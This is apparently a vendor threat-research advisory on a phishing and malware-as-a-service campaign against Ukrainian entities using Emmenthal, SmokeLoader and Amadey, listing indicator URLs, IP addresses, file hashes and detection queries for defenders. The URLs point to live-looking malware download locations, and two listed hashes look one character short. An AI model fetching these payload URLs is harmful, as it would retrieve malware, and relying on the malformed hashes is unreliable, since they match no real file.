MaaS Operation Using Emmenhtal and Amadey Linked to Threats Against Ukrainian Entities

    Friday, July 18, 2025 In: Threat Research Print

    Date: 07/18/2025

    Severity: Medium

    Summary

    In early February 2025, a phishing campaign targeting Ukrainian entities used invoice and billing-themed emails containing compressed archives with obfuscated JavaScript files. These files deployed PowerShell downloaders to install SmokeLoader, leveraging the Emmenthal loader. Further analysis revealed similar Emmenthal samples on GitHub that were not email-delivered and instead deployed Amadey, which downloaded custom payloads from public GitHub repositories. This activity suggests a broader Malware-as-a-Service (MaaS) operation using Emmenthal and Amadey, with GitHub repositories serving as payload staging platforms.

    Indicators of Compromise (IOC) List

    Url/Domain

    http://pivqmane.com/doc/fb.mp4

    http://pivqmane.com/testonload.mp4

    http://185.215.113.16/test/amnew.exe

    http://185.215.113.43/Zu7JuNko/index.php

    IP Address

    185.156.73.73

    185.215.113.209

    185.215.113.75

    Hash

    4e3951e668464efe8195d45fea7967857070a7d20d2c0e22f3c0f10bb2a8f8b

    87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

    718be762e8bd513283cd5e21634dc65bd160e47121716fd058daf5f3be42728a

    9bcfc98998b9e42b86204e66605b65462eeb8cfd8a0661b3ceebc99d4277e83c

    c62e7aca9bf6c20f7394d6d59b202af56150defbb6fae06e8443b7c6d71244d

    21cf7da02e01b3c2317178395eff873e50ab9b8f27a23ffed37b2efff8fd6b90

    35c1eb5ff8913c4ca4feb712e05354772146247bdb4b337868c687730f201023

    0334cd1b8ab17203179da1ae77c1fad97ddf794cc63a6048aca664956d10b2ca

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 : 

    domainname like "http://pivqmane.com/doc/fb.mp4" or siteurl like "http://pivqmane.com/doc/fb.mp4" or url like "http://pivqmane.com/doc/fb.mp4" or domainname like "http://185.215.113.16/test/amnew.exe" or siteurl like "http://185.215.113.16/test/amnew.exe" or url like "http://185.215.113.16/test/amnew.exe" or domainname like "http://185.215.113.43/Zu7JuNko/index.php" or siteurl like "http://185.215.113.43/Zu7JuNko/index.php" or url like "http://185.215.113.43/Zu7JuNko/index.php" or domainname like "http://pivqmane.com/testonload.mp4" or siteurl like "http://pivqmane.com/testonload.mp4" or url like "http://pivqmane.com/testonload.mp4"

    Detection Query 2 : 

    dstipaddress IN ("185.215.113.75","185.215.113.209","185.156.73.73") or srcipaddress IN ("185.215.113.75","185.215.113.209","185.156.73.73")

    Detection Query 3 : 

    sha256hash IN ("21cf7da02e01b3c2317178395eff873e50ab9b8f27a23ffed37b2efff8fd6b90","87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f","4e3951e668464efe8195d45fea7967857070a7d20d2c0e22f3c0f10bb2a8f8b","718be762e8bd513283cd5e21634dc65bd160e47121716fd058daf5f3be42728a","9bcfc98998b9e42b86204e66605b65462eeb8cfd8a0661b3ceebc99d4277e83c","c62e7aca9bf6c20f7394d6d59b202af56150defbb6fae06e8443b7c6d71244d","35c1eb5ff8913c4ca4feb712e05354772146247bdb4b337868c687730f201023","0334cd1b8ab17203179da1ae77c1fad97ddf794cc63a6048aca664956d10b2ca")

    Reference:    

    https://blog.talosintelligence.com/maas-operation-using-emmenhtal-and-amadey-linked-to-threats-against-ukrainian-entities/


    Tags

    MalwareSmokeLoaderEmmenthalAmadeyUkrainePhishing

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.